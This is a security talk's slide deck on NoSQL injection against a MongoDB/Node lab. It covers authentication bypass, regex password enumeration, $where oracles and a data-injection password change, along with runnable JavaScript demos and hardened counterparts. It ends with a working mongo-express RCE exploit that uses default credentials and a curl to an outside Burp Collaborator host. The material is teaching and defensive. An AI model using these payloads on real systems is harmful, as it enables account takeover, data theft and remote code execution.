NoSql Injection


Let's review some code and understand how the advanced injection attack NoSQLi (NoSQL injection) occurs.


  1. NoSql Injection
     By Husseni Muzkkir
     Date: 23/04/2020
     Venue: Net Square #TechieThursday
  2. #WHOAMI
     Muzkkir H., Security Analyst
     LinkedIn: @hussenimuzkkir
     Twitter: @MuzkkirHusseni
  3. Agenda
     - SQL vs NoSQL databases
     - NoSQL injection
     - Lab creation
     - Lab walkthrough
     - Insecure coding and secure coding
     - CVE and exploits
  4. Why NoSql Database ?
     A relational database may require vertical and sometimes horizontal expansion of servers. What you need is a very agile delivery system that can easily process unstructured data, and the system of engagement needs to be extremely dynamic. NoSQL allows high-performance, agile processing of information at massive scale: it stores unstructured data across multiple processing nodes and across multiple servers.
     1. Key-value stores -> Riak, Voldemort and Redis
     2. Wide-column stores -> Cassandra and HBase
     3. Document databases -> MongoDB and CouchDB
     4. Graph databases -> Neo4J and HyperGraphDB
  5. Data Store in SQL vs NoSQL

     SQL database (one row per user; a missing value is stored as null):

     | id | username | password | 2FA    |
     |----|----------|----------|--------|
     | 1  | admin    | P@$$w0rD | Enable |
     | 2  | user1    | 123456   | null   |
     | 3  | user2    | null     | null   |

     NoSQL database (one document per user; absent fields are simply omitted):

     [
       { "id" : 1, "username" : "admin", "password" : "P@$$w0rD", "2FA" : "Enable" },
       { "id" : 2, "username" : "user1", "password" : "123456" },
       { "id" : 3, "username" : "user2" }
     ]
  6. Query Structure
     SQL:
       SELECT * FROM table WHERE username = '$username' AND password = '$password'
     NoSQL (MongoDB):
       db.collection.find({username: "$username", password: "$password"});
     Query operators in NoSQL:
       $ne    -> not equal
       $gt    -> greater than
       $regex -> regular expression
       $where -> lets you specify a JavaScript expression or function that filters results
     The difference that matters for injection: in SQL the attacker's input is text that breaks out of a quoted string, while in MongoDB the query is an object, so the attack is to get an operator object such as {"$ne": 0} accepted in place of a string value, either directly from the body parser or through JSON syntax when the application builds the object from concatenated text.
  7. NoSQL Injection
     NoSQL injection is a security vulnerability that lets an attacker take control of database queries through the unsafe use of user input. It can be used by an attacker to:
     - expose unauthorized information
     - modify data
     db.items.find(queryObject)
     - db          -> the current database object
     - items       -> the collection named 'items' in the current database
     - find        -> the method to execute on the collection
     - queryObject -> an object used to select data; whoever controls any part of it controls which documents are matched
  8. LAB Creation
     In this NoSQL lab I have implemented realistic and possible attack scenarios.
     1. VM lab: use an Alpine or Ubuntu system as required.
     2. Installed dependencies: MongoDB and NodeJS installation.
     3. Build code: create possible attack scenarios and write the code.
     4. Run and test: deploy the code and try to bypass the mechanism.
  9. LAB Walkthrough
     Possible attack vectors:
     - authentication bypass
     - enumeration
     - data manipulation
     - MongoDB injection ($where)
     - DoS
     - and more
  10. Authentication Bypass
      Request body:
        id={"$ne":0}&email=muzkkir%40net-square.com&password=","password":{"$ne":0},"email":"muzkkir@net-square.com
  11. Authentication Bypass
      Backend query after the concatenated string is parsed:
        { "_id": {"$ne":0}, "email": "muzkkir%40net-square.com", "password": "", "password": {"$ne":0}, "email": "muzkkir@net-square.com" }
      JSON.parse keeps the last occurrence of a duplicated key, so the query that reaches MongoDB is effectively { _id: {$ne: 0}, email: "muzkkir@net-square.com", password: {$ne: 0} }. Every field is a "not equal" test that any user document satisfies, and the victim's document is returned without the password being known.
      Reason: the query is built by string concatenation and then parsed, so the user's input becomes JSON syntax:
        var query = '{ "_id" : ' + id + ', "email" : "' + email + '", "password" : "' + password + '" }';
        (the string is passed through JSON.parse before the find)
      Fix: build the query as an object, so the input is only ever a value:
        var query = { "_id" : id, "email" : email, "password" : password };
      Caveat: this closes the string-concatenation hole only. If the body parser can itself produce objects (a JSON body, or qs "extended" parsing of id[$ne]=0), each of id, email and password must also be checked to be a string before it is placed in the query.
  12. Enumeration of Password
      Same injection point, but the password condition becomes a $regex test instead of $ne:
        id={"$ne":0}&email=muzkkir%40net-square.com&password=","password":{"$regex":"^n"},"email":"muzkkir@net-square.com
  13. Enumeration of Password
      The login succeeds only when the regex matches the stored password, so the response is a yes/no oracle and the password is recovered one character at a time by extending the prefix:
        "password" : { "$regex" : "^n" }
        "password" : { "$regex" : "^n8K" }
        "password" : { "$regex" : "^n8K!3" }
        "password" : { "$regex" : "^n8K!3p6$" }   (exact match: n8K!3p6)
      Anchor the pattern with ^ (and $ for the final check): an unanchored "n*" matches every string, because * allows zero occurrences, and gives no information. This works because the lab stores passwords in clear text; against a hashed password the same oracle would only reveal the hash.
      Enumerating another user's password: change the email and start with an empty pattern, which confirms the account exists:
        id={"$ne":0}&email=ravi%40net-square.com&password=","password":{"$regex":""},"email":"ravi@net-square.com
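The bypass on slides 10-11 and the enumeration on slides 12-13, as an added example that is not code from the slides: the lab's vulnerable login is re-created against an in-memory "collection" so both attacks run offline without MongoDB, next to the hardened builder with the string check the caveat above asks for. The user documents, the helper names and the tiny operator evaluator are constructed for this illustration and only implement the three forms of match the payloads use.

```javascript
// Added example, not code from the slides: the lab's vulnerable login
// re-created against an in-memory "collection" so the authentication bypass
// (slides 10-11) and the $regex password enumeration (slides 12-13) can be
// run offline without MongoDB. The user documents, the helper names and the
// tiny operator evaluator below are constructed for this illustration.

const users = [
  { _id: 1, email: "muzkkir@net-square.com", password: "n8K!3p6" },
  { _id: 2, email: "ravi@net-square.com", password: "Hunter2" },
];

// Vulnerable: the query is assembled as JSON text and parsed, the pattern
// the slides show. Attacker-supplied text becomes JSON syntax.
function buildQueryInsecure(id, email, password) {
  const text = '{ "_id" : ' + id + ', "email" : "' + email +
               '", "password" : "' + password + '" }';
  return JSON.parse(text); // with duplicate keys the last occurrence wins
}

// Hardened: values go into an object, never into JSON syntax, and each one
// must be a string or number, so an operator object such as {$ne: 0} that a
// JSON body parser (or qs "extended" parsing) could deliver is rejected.
function buildQuerySecure(id, email, password) {
  const isScalar = (v) => typeof v === "string" || typeof v === "number";
  if (![id, email, password].every(isScalar)) {
    throw new TypeError("query values must be strings or numbers");
  }
  return { _id: id, email: email, password: password };
}

// Just enough of MongoDB's matching to run the lab payloads: equality,
// {$ne: x} and {$regex: pattern}. Anything else is treated as no match.
function matchesField(value, condition) {
  if (condition !== null && typeof condition === "object") {
    if ("$ne" in condition) return value !== condition.$ne;
    if ("$regex" in condition) return new RegExp(condition.$regex).test(String(value));
    return false;
  }
  return value === condition;
}

function findOne(query) {
  const hit = users.find((doc) =>
    Object.keys(query).every((k) => matchesField(doc[k], query[k])));
  return hit || null;
}

// Slide 10: id and password carry the injected operators, the email is the
// victim's. The result is the victim's document without knowing the password.
function authBypass() {
  const id = '{"$ne":0}';
  const email = "muzkkir@net-square.com";
  const password = '","password":{"$ne":0},"email":"' + email;
  return findOne(buildQueryInsecure(id, email, password));
}

// Slides 12-13: the login is a yes/no oracle. Extend a known prefix one
// character at a time with an anchored $regex; the prefix is regex-escaped
// and JSON-encoded so any printable character can be recovered.
const PRINTABLE = Array.from({ length: 95 }, (_, i) => String.fromCharCode(32 + i));

function enumeratePassword(email, alphabet = PRINTABLE, maxLen = 64) {
  const escapeRegex = (s) => s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
  let known = "";
  for (let i = 0; i < maxLen; i++) {
    const next = alphabet.find((ch) => {
      const pattern = "^" + escapeRegex(known + ch);
      const password = '","password":{"$regex":' + JSON.stringify(pattern) +
                       '},"email":"' + email;
      return findOne(buildQueryInsecure('{"$ne":0}', email, password)) !== null;
    });
    if (next === undefined) break; // nothing extends the prefix: done
    known += next;
  }
  return known;
}

// The hardened builder given the slide-10 strings: they are compared as
// literal values, so nothing matches.
function authBypassAgainstSecure() {
  const email = "muzkkir@net-square.com";
  const password = '","password":{"$ne":0},"email":"' + email;
  return findOne(buildQuerySecure('{"$ne":0}', email, password));
}

console.log("bypass:", authBypass());
console.log("password:", enumeratePassword("muzkkir@net-square.com"));
```

Run with node; the enumeration needs one request per alphabet character per position, which is why the oracle is worth rate limiting and logging even after the builder is fixed.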
  14. MongoDB Injection
  15. MongoDB Injection
      When the application passes a client-controlled object straight to find(), the attacker can supply the $where operator, which runs JavaScript on the server:
        { "$where": "1==1" }
  16. MongoDB Injection
      A $where condition is a boolean oracle in the same way as $regex, so server-side information is extracted one test at a time, starting with the length of the server version string:
        {"$where":"function(){return(version().length=='5');}"}
  17. MongoDB Injection
      Then each character of the version:
        { "$where" : "function(){ return( version()[0] == '3' );}" }
        { "$where" : "function(){ return( version()[1] == '.' );}" }
        { "$where" : "function(){ return( version()[2] == '6' );}" }
        { "$where" : "function(){ return( version()[3] == '.' );}" }
        { "$where" : "function(){ return( version()[4] == '8' );}" }
      Version = "3.6.8"
      Other functions usable inside $where:
        sleep(5000)                 -> delays the response by 5 seconds (the argument is in milliseconds), a time-based oracle when the response itself shows no difference
        if/else condition           -> branch inside the function to retrieve more information per request
        var i=1; while(1){ i=i+1 }  -> infinite loop, resource exhaustion (DoS)
      $where needs server-side JavaScript to be enabled on mongod; setting security.javascriptEnabled: false in the configuration (or starting mongod with --noscripting) removes this whole class of attack.
  18. Data Injecting to change password
  19. Data Injecting to change password
      This endpoint writes a record with the same string concatenation, so closing the quoted time value and adding a new key lets the attacker set a field the form never exposed:
        email=muzkkir@net-square.com&time=2:34:42","password":"123456
      After parsing, the document is { "email": "muzkkir@net-square.com", "time": "2:34:42", "password": "123456" } and the password has been changed. The fix is the same as for the login: build the document as an object and copy only the fields this endpoint is meant to update, so an injected "password" key is dropped.
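Input hardening for the $where payload on slides 14-17 and the password-change payload on slides 18-19, as an added example that is not code from the slides: a check that walks any client-supplied value and reports the path of the first MongoDB operator key, and an update builder that copies only allow-listed fields into $set. The function names, the allow-listed field and the sample request bodies are constructed for this illustration; the operator check is the same idea as the mongo-sanitize package, written out so the behaviour is visible. Together with security.javascriptEnabled: false on mongod this covers both cases.

```javascript
// Added example, not code from the slides: input hardening for the cases on
// slides 14-19, where either a client-controlled object (the $where payload)
// or a client-controlled string (the password-change payload) reaches the
// query. Function names, the allow-listed field and the sample request bodies
// are constructed for this illustration.

// Walk any client-supplied value and report the path of the first key that
// names a MongoDB operator ($where, $ne, $regex, $gt, ...). A handler can
// reject the request and log that path.
function findOperatorKey(value, path = "") {
  if (Array.isArray(value)) {
    for (let i = 0; i < value.length; i++) {
      const hit = findOperatorKey(value[i], path + "[" + i + "]");
      if (hit !== null) return hit;
    }
    return null;
  }
  if (value !== null && typeof value === "object") {
    for (const [k, v] of Object.entries(value)) {
      const here = path === "" ? k : path + "." + k;
      if (k.startsWith("$")) return here;
      const hit = findOperatorKey(v, here);
      if (hit !== null) return hit;
    }
  }
  return null; // scalars cannot carry an operator
}

// Reject-or-pass wrapper to put in front of every find()/update() argument.
function assertNoOperators(value) {
  const hit = findOperatorKey(value);
  if (hit !== null) throw new Error("operator in client input at " + hit);
  return value;
}

// Slide 19, vulnerable form: the document is concatenated and parsed, so
// closing the quoted time value lets the client add a "password" key.
function buildProfileUpdateInsecure(email, time) {
  return JSON.parse('{ "email": "' + email + '", "time": "' + time + '" }');
}

// Hardened form: copy only allow-listed string fields into $set. Any extra
// key in the body, injected or not, never reaches the database.
const UPDATABLE_FIELDS = ["time"]; // assumption: this endpoint only sets time
function buildProfileUpdate(body) {
  assertNoOperators(body);
  const set = {};
  for (const field of UPDATABLE_FIELDS) {
    if (typeof body[field] === "string") set[field] = body[field];
  }
  if (Object.keys(set).length === 0) throw new Error("nothing to update");
  return { $set: set };
}

// Constructed request bodies: the slide-15 $where payload, a nested operator
// as a JSON body parser would deliver it, and the slide-19 time value.
const whereBody = { $where: "1==1" };
const nestedBody = { email: "muzkkir@net-square.com", password: { $ne: 0 } };
const injectedTime = '2:34:42","password":"123456';

console.log(findOperatorKey(whereBody));   // $where
console.log(findOperatorKey(nestedBody));  // password.$ne
console.log(buildProfileUpdateInsecure("muzkkir@net-square.com", injectedTime));
console.log(buildProfileUpdate({ email: "muzkkir@net-square.com", time: injectedTime }));
```

With the hardened builder the injected time string is stored as a literal value of the time field, which is harmless; the operator check is what stops a JSON body from reaching find() with $where or $ne in it, and the reported path is a useful thing to log for detection.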
  20. Insecure Code
  21. Secure Code
  22. Console Logs
      Insecure coding query...
      Secure coding query...
  23. CVE-2019-10758
      Vulnerability: mongo-express@0.53.0 (fixed in 0.54.0), remote code execution. Endpoints that parse a client-supplied document with toBSON evaluate it through Node's vm module, and vm is not a security boundary, so the document text can escape the sandbox and run arbitrary code on the mongo-express host.
      Exploit (authenticated; the Basic header decodes to admin:pass, mongo-express' default credentials):
        curl 'http://localhost:8081/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw==' --data 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://cvbytcxi73hi1p93tya3ubmcm3stgi.burpcollaborator.net")'
      this.constructor.constructor reaches the host Function constructor from inside the vm context; from the returned process object the payload requires child_process and runs a command. The outbound curl to the Burp Collaborator host confirms execution out of band.
  24. Thanks!!
      Muzkkir H., Net Square
      LinkedIn: hussenimuzkkir
      Twitter: MuzkkirHusseni